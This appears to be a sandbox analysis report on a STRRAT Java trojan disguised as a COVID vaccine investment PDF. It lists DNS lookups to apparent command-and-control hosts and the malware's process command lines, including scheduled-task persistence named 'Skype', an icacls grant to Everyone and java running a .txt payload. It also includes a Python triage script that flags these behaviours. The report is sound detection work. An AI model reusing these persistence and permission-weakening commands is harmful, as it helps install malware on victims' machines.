Feb 23, 2021 21:04:23.188406944 CET | 8.8.8.8 | 192.168.2.3 | 0x439e | No error (0) | github-releases.githubusercontent.com | - | 185.199.109.154 | A (IP address) | IN (0x0001)
Feb 23, 2021 21:04:23.188406944 CET | 8.8.8.8 | 192.168.2.3 | 0x439e | No error (0) | github-releases.githubusercontent.com | - | 185.199.110.154 | A (IP address) | IN (0x0001)
Feb 23, 2021 21:04:23.188406944 CET | 8.8.8.8 | 192.168.2.3 | 0x439e | No error (0) | github-releases.githubusercontent.com | - | 185.199.111.154 | A (IP address) | IN (0x0001)
Feb 23, 2021 21:04:50.826561928 CET | 8.8.8.8 | 192.168.2.3 | 0xba98 | Server failure (2) | jbfrost.live | none | none | A (IP address) | IN (0x0001)
Feb 23, 2021 21:04:51.047672987 CET | 8.8.8.8 | 192.168.2.3 | 0xd94a | No error (0) | pastebin.com | - | 104.23.99.190 | A (IP address) | IN (0x0001)
Feb 23, 2021 21:04:51.047672987 CET | 8.8.8.8 | 192.168.2.3 | 0xd94a | No error (0) | pastebin.com | - | 104.23.98.190 | A (IP address) | IN (0x0001)
Feb 23, 2021 21:04:52.462094069 CET | 8.8.8.8 | 192.168.2.3 | 0x75b5 | No error (0) | pluginserver.duckdns.org | - | 23.239.31.129 | A (IP address) | IN (0x0001)
Feb 23, 2021 21:05:04.521935940 CET | 8.8.8.8 | 192.168.2.3 | 0xbd0 | No error (0) | strizzz100.duckdns.org | - | 107.175.144.243 | A (IP address) | IN (0x0001)
Feb 23, 2021 21:05:59.302706003 CET | 8.8.8.8 | 192.168.2.3 | 0x5536 | No error (0) | strizzz100.duckdns.org | - | 107.175.144.243 | A (IP address) | IN (0x0001)
Feb 23, 2021 21:05:59.535707951 CET | 8.8.8.8 | 192.168.2.3 | 0x3a23 | No error (0) | pluginserver.duckdns.org | - | 23.239.31.129 | A (IP address) | IN (0x0001)
Feb 23, 2021 21:06:35.237154007 CET | 8.8.8.8 | 192.168.2.3 | 0xd395 | No error (0) | pluginserver.duckdns.org | - | 23.239.31.129 | A (IP address) | IN (0x0001)

HTTPS Packets

Each entry lists the connection (server side is the Source, the analysis host is the Dest), the leaf and intermediate certificates presented by the server, and the JA3 fingerprint of the client.

Timestamp: Feb 23, 2021 21:04:22.865737915 CET
Source IP:Port: 140.82.121.3:443
Dest IP:Port: 192.168.2.3:49721
Leaf certificate
  Subject: CN=github.com, O="GitHub, Inc.", L=San Francisco, ST=California, C=US
  Issuer: CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US
  Not Before: Tue May 05 02:00:00 CEST 2020
  Not After: Tue May 10 14:00:00 CEST 2022
Intermediate certificate
  Subject: CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US
  Issuer: CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US
  Not Before: Tue Oct 22 14:00:00 CEST 2013
  Not After: Sun Oct 22 14:00:00 CEST 2028
JA3 SSL Client Fingerprint: 771,49188-49192-61-49190-49194-107-106-49162-49172-53-49157-49167-57-56-49187-49191-60-49189-49193-103-64-49161-49171-47-49156-49166-51-50-49196-49195-49200-157-49198-49202-159-163-49199-156-49197-49201-158-162-255,10-11-13-23-0,23-24-25-9-10-11-12-13-14-22,0
JA3 SSL Client Digest: d2935c58fe676744fecc8614ee5356c7

Three connections to repo1.maven.org, all presenting the same certificate chain and the same JA3 values:
Timestamp: Feb 23, 2021 21:04:22.868626118 CET, Source IP:Port: 199.232.192.209:443, Dest IP:Port: 192.168.2.3:49719
Timestamp: Feb 23, 2021 21:04:22.868731022 CET, Source IP:Port: 199.232.192.209:443, Dest IP:Port: 192.168.2.3:49720
Timestamp: Feb 23, 2021 21:04:22.868848085 CET, Source IP:Port: 199.232.192.209:443, Dest IP:Port: 192.168.2.3:49718
Leaf certificate
  Subject: CN=repo1.maven.org, O="Sonatype, Inc", L=Fulton, ST=Maryland, C=US
  Issuer: CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US
  Not Before: Mon Aug 17 02:00:00 CEST 2020
  Not After: Wed Sep 08 14:00:00 CEST 2021
Intermediate certificate
  Subject: CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US
  Issuer: CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US
  Not Before: Fri Mar 08 13:00:00 CET 2013
  Not After: Wed Mar 08 13:00:00 CET 2023
JA3 SSL Client Fingerprint: 771,49188-49192-61-49190-49194-107-106-49162-49172-53-49157-49167-57-56-49187-49191-60-49189-49193-103-64-49161-49171-47-49156-49166-51-50-49196-49195-49200-157-49198-49202-159-163-49199-156-49197-49201-158-162-255,10-11-13-23-0,23-24-25-9-10-11-12-13-14-22,0
JA3 SSL Client Digest: d2935c58fe676744fecc8614ee5356c7

Timestamp: Feb 23, 2021 21:04:23.355176926 CET
Source IP:Port: 185.199.108.154:443
Dest IP:Port: 192.168.2.3:49722
Leaf certificate
  Subject: CN=www.github.com, O="GitHub, Inc.", L=San Francisco, ST=California, C=US
  Issuer: CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US
  Not Before: Wed May 06 02:00:00 CEST 2020
  Not After: Thu Apr 14 14:00:00 CEST 2022
Intermediate certificate
  Subject: CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US
  Issuer: CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US
  Not Before: Tue Oct 22 14:00:00 CEST 2013
  Not After: Sun Oct 22 14:00:00 CEST 2028
JA3 SSL Client Fingerprint: 771,49188-49192-61-49190-49194-107-106-49162-49172-53-49157-49167-57-56-49187-49191-60-49189-49193-103-64-49161-49171-47-49156-49166-51-50-49196-49195-49200-157-49198-49202-159-163-49199-156-49197-49201-158-162-255,10-11-13-23-0,23-24-25-9-10-11-12-13-14-22,0
JA3 SSL Client Digest: d2935c58fe676744fecc8614ee5356c7

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 21:04:10
Start date: 23/02/2021
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c 7za.exe x -y -oC:\jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar'
Imagebase: 0x7ff77d8b0000
File size: 273920 bytes
MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 21:04:11
Start date: 23/02/2021
Path: C:\Windows\System32\7za.exe
Wow64 process (32bit): true
Commandline: 7za.exe x -y -oC:\jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar'
Imagebase: 0xb40000
File size: 289792 bytes
MD5 hash: 77E556CDFDC5C592F5C46DB4127C6F4C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000002.00000003.200309664.0000000002C90000.00000004.00000001.sdmp, Author: Florian Roth
Reputation: high

General

Start time: 21:04:11
Start date: 23/02/2021
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\cmd.exe' /c java.exe -jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar' keuqzwqbvn.Mmwwrnygnfl >> C:\cmdlinestart.log 2>&1
Imagebase: 0x7ff77d8b0000
File size: 273920 bytes
MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 21:04:12
Start date: 23/02/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 21:04:12
Start date: 23/02/2021
Path: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe
Wow64 process (32bit): true
Commandline: java.exe -jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar' keuqzwqbvn.Mmwwrnygnfl
Imagebase: 0xf0000
File size: 192376 bytes
MD5 hash: 28733BA8C383E865338638DF5196E6FE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Java
Yara matches:
• Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000006.00000002.207844794.0000000014D78000.00000004.00000001.sdmp, Author: Florian Roth
Reputation: moderate

                                                                                                                                          General

                                                                                                                                          Start time:21:04:13
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
                                                                                                                                          Imagebase:0xa80000
                                                                                                                                          File size:29696 bytes
                                                                                                                                          MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          General

                                                                                                                                          Start time:21:04:13
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6b2800000
                                                                                                                                          File size:625664 bytes
                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          General

                                                                                                                                          Start time:21:04:13
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:wscript C:\Users\user\fukvowbkrs.js
                                                                                                                                          Imagebase:0x1340000
                                                                                                                                          File size:147456 bytes
                                                                                                                                          MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          General

                                                                                                                                          Start time:21:04:19
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
                                                                                                                                          Imagebase:0x940000
                                                                                                                                          File size:192376 bytes
                                                                                                                                          MD5 hash:4BFEB2F64685DA09DEBB95FB981D4F65
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 0000000B.00000002.238594494.0000000009FA0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 0000000B.00000002.238481797.0000000009F6E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          Reputation:moderate

                                                                                                                                          General

                                                                                                                                          Start time:21:04:26
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\vmlpusjwhz.txt'
                                                                                                                                          Imagebase:0xf0000
                                                                                                                                          File size:192376 bytes
                                                                                                                                          MD5 hash:28733BA8C383E865338638DF5196E6FE
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 0000000D.00000002.253231810.000000000A5A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_STRRAT, Description: Yara detected STRRAT, Source: 0000000D.00000002.252958465.0000000005427000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_STRRAT, Description: Yara detected STRRAT, Source: 0000000D.00000002.252569519.00000000051C5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 0000000D.00000002.253164708.000000000A56E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          Reputation:moderate

                                                                                                                                          General

                                                                                                                                          Start time:21:04:28
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6b2800000
                                                                                                                                          File size:625664 bytes
                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          General

                                                                                                                                          Start time:21:04:34
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:cmd /c schtasks /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
                                                                                                                                          Imagebase:0xbd0000
                                                                                                                                          File size:232960 bytes
                                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          General

                                                                                                                                          Start time:21:04:34
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
                                                                                                                                          Imagebase:0xf0000
                                                                                                                                          File size:192376 bytes
                                                                                                                                          MD5 hash:28733BA8C383E865338638DF5196E6FE
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_STRRAT, Description: Yara detected STRRAT, Source: 00000010.00000002.519763899.0000000004ECD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_STRRAT, Description: Yara detected STRRAT, Source: 00000010.00000002.517894566.0000000004DCD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000010.00000002.520726996.0000000009F9E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000010.00000002.520453366.0000000009F6C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          Reputation:moderate

                                                                                                                                          General

                                                                                                                                          Start time:21:04:34
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6b2800000
                                                                                                                                          File size:625664 bytes
                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                          General

                                                                                                                                          Start time:21:04:35
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6b2800000
                                                                                                                                          File size:625664 bytes
                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                          General

                                                                                                                                          Start time:21:04:35
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:schtasks /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
                                                                                                                                          Imagebase:0x7ff7ca4e0000
                                                                                                                                          File size:185856 bytes
                                                                                                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                          General

                                                                                                                                          Start time:21:04:36
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\System32\notepad.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\NOTEPAD.EXE C:\Users\user\AppData\Roaming\vmlpusjwhz.txt
                                                                                                                                          Imagebase:0x7ff7977d0000
                                                                                                                                          File size:245760 bytes
                                                                                                                                          MD5 hash:BB9A06B8F2DD9D24C77F389D7B2B58D2
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
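The records above spell out the sample's execution chain one process at a time: icacls loosens an ACL for Everyone, wscript runs a dropped .js from the user profile, javaw and java execute a file named vmlpusjwhz.txt with -jar (a JAR wearing a .txt extension), cmd creates a scheduled task named Skype whose action is that same .txt, and notepad finally opens the .txt so the victim sees harmless-looking content. The following triage script is an added example, not part of this report or of Joe Sandbox's tooling: it parses records in the "General" key:value layout shown here and flags exactly those behaviours, including the cross-record correlation that marks the notepad launch as a decoy because another record ran the same file as a jar. The trimmed sample records, the heuristics and every function name are assumptions made for the example.

```python
"""Triage the per-process "General" records of a sandbox report (added example).

Not code from the original report or from Joe Sandbox. It parses the key:value records
shown on this page and flags what the report attributes to this STRRAT sample: java/javaw
running a -jar payload whose extension is not .jar, schtasks /create pointing into the user
profile, icacls granting Everyone modify/full control, a script host running a user-profile
script, and notepad opening the very file java ran as a jar (the decoy). The trimmed record
layout and all function names are assumptions.
"""
import re
from pathlib import PureWindowsPath

# Constructed sample: command lines are the ones this report shows, trimmed to two fields.
SAMPLE = r"""
General
Path:C:\Windows\SysWOW64\icacls.exe
Commandline:C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
General
Path:C:\Windows\SysWOW64\wscript.exe
Commandline:wscript C:\Users\user\fukvowbkrs.js
General
Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
Commandline:'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
General
Path:C:\Windows\SysWOW64\cmd.exe
Commandline:cmd /c schtasks /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
General
Path:C:\Windows\System32\notepad.exe
Commandline:C:\Windows\system32\NOTEPAD.EXE C:\Users\user\AppData\Roaming\vmlpusjwhz.txt
"""

USER_PROFILE = re.compile(r"^[a-z]:\\users\\", re.I)
TOKEN = re.compile(r"(?:'[^']*'|\"[^\"]*\"|[^\s'\"])+")  # runs of quoted or unquoted text
JAVA = {"java", "java.exe", "javaw", "javaw.exe"}
SCRIPT_HOSTS = {"wscript", "wscript.exe", "cscript", "cscript.exe"}
basename = lambda token: PureWindowsPath(token).name.lower()


def parse_records(text):
    """Split the report on "General" headers into dicts of key -> value."""
    records, cur = [], None
    for line in (l.strip() for l in text.splitlines()):
        if line == "General":
            cur = {}
            records.append(cur)
        elif line and cur is not None and ":" in line:
            key, value = line.split(":", 1)  # first colon only: values contain C:\ paths
            cur[key.strip()] = value.strip()
    return records

def tokenize(cmdline):
    """Split on whitespace outside quotes, then drop the quotes; backslashes stay literal."""
    return [re.sub(r"['\"]", "", t) for t in TOKEN.findall(cmdline)]

def option_value(tokens, name):
    """Value after a case-insensitive option such as /tn or -jar, or None."""
    low = [t.lower() for t in tokens]
    i = low.index(name) if name in low else -1
    return tokens[i + 1] if 0 <= i < len(tokens) - 1 else None

def flag_command(cmdline):
    """Return (jar_target_or_None, findings) for one command line."""
    tokens = tokenize(cmdline)
    if tokens and basename(tokens[0]) in ("cmd", "cmd.exe") and option_value(tokens, "/c"):
        tokens = tokens[[t.lower() for t in tokens].index("/c") + 1:]  # judge the inner command
    if not tokens:
        return None, []
    exe, low, findings, jar = basename(tokens[0]), [t.lower() for t in tokens], [], None
    if exe in JAVA:
        jar = option_value(tokens, "-jar")
        if jar and PureWindowsPath(jar).suffix.lower() != ".jar":
            findings.append(f"java -jar payload with non-.jar extension: {jar}")
    elif exe in ("schtasks", "schtasks.exe") and "/create" in low:
        name, action = option_value(tokens, "/tn"), option_value(tokens, "/tr")
        findings.append(f"scheduled task persistence: /tn {name} -> {action}")
        if action and USER_PROFILE.match(action):
            findings.append("task action runs a file under the user profile")
    elif exe in ("icacls", "icacls.exe"):
        grant = option_value(tokens, "/grant") or ""
        if grant.lower().startswith("everyone:") and grant[-1].upper() in "MF":
            findings.append(f"ACL weakened for Everyone on {tokens[1]}: {grant}")
    elif exe in SCRIPT_HOSTS:
        findings += [f"script host running user-profile script: {a}"
                     for a in tokens[1:] if not a.startswith("/") and USER_PROFILE.match(a)]
    return jar, findings

def scan(text):
    """Flag every record, then correlate: notepad showing the jar payload is the decoy."""
    analysed = [(rec, *flag_command(rec.get("Commandline", ""))) for rec in parse_records(text)]
    jar_targets = {jar.lower() for _, jar, _ in analysed if jar}
    hits = []
    for rec, _, findings in analysed:
        tokens = tokenize(rec.get("Commandline", ""))
        if tokens and basename(tokens[0]) == "notepad.exe":
            findings += [f"decoy: notepad displays the file java ran as a jar: {a}"
                         for a in tokens[1:] if a.lower() in jar_targets]
        if findings:
            hits.append({"path": rec.get("Path"), "findings": findings})
    return hits
```

Running `scan(SAMPLE)` returns five hits (icacls, wscript, javaw, the cmd wrapper around schtasks, and notepad); the conhost records produce nothing because `flag_command` only reacts to the named binaries. The tokenizer is hand-rolled rather than `shlex` because the report renders Windows command lines with single quotes and unescaped backslashes, which `shlex` in POSIX mode would mangle; the `cmd /c` unwrapping matters because the persistence command appears twice here, once wrapped and once as the bare schtasks.exe process, and both should be judged the same way.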

General

Start time: 21:04:40
Start date: 23/02/2021
Path: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\AppData\Roaming\plugins.jar' mp
Imagebase: 0xf0000
File size: 192376 bytes
MD5 hash: 28733BA8C383E865338638DF5196E6FE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_STRRAT, Description: Yara detected STRRAT, Source: 00000018.00000002.521334832.000000000A810000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_STRRAT, Description: Yara detected STRRAT, Source: 00000018.00000002.517833863.000000000543D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000018.00000002.520047801.000000000A56A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000018.00000002.520214796.000000000A5A2000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                          General

                                                                                                                                          Start time:21:04:42
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6b2800000
                                                                                                                                          File size:625664 bytes
                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                          General

                                                                                                                                          Start time:21:04:46
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\System32\notepad.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\vmlpusjwhz.txt
                                                                                                                                          Imagebase:0x7ff7977d0000
                                                                                                                                          File size:245760 bytes
                                                                                                                                          MD5 hash:BB9A06B8F2DD9D24C77F389D7B2B58D2
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                          General

                                                                                                                                          Start time:21:04:55
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\System32\notepad.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\vmlpusjwhz.txt
                                                                                                                                          Imagebase:0x7ff7977d0000
                                                                                                                                          File size:245760 bytes
                                                                                                                                          MD5 hash:BB9A06B8F2DD9D24C77F389D7B2B58D2
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                          General

                                                                                                                                          Start time:21:05:03
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\plugins.jar' mp
                                                                                                                                          Imagebase:0xd60000
                                                                                                                                          File size:192376 bytes
                                                                                                                                          MD5 hash:4BFEB2F64685DA09DEBB95FB981D4F65
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000024.00000002.317682510.0000000004E1D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000024.00000002.317809866.0000000004E65000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000024.00000002.317648149.0000000004E10000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                          General

                                                                                                                                          Start time:21:05:11
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Windows\System32\notepad.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\vmlpusjwhz.txt
                                                                                                                                          Imagebase:0x7ff7977d0000
                                                                                                                                          File size:245760 bytes
                                                                                                                                          MD5 hash:BB9A06B8F2DD9D24C77F389D7B2B58D2
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                          General

                                                                                                                                          Start time:21:05:20
                                                                                                                                          Start date:23/02/2021
                                                                                                                                          Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\plugins.jar' mp
                                                                                                                                          Imagebase:0xd60000
                                                                                                                                          File size:192376 bytes
                                                                                                                                          MD5 hash:4BFEB2F64685DA09DEBB95FB981D4F65
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
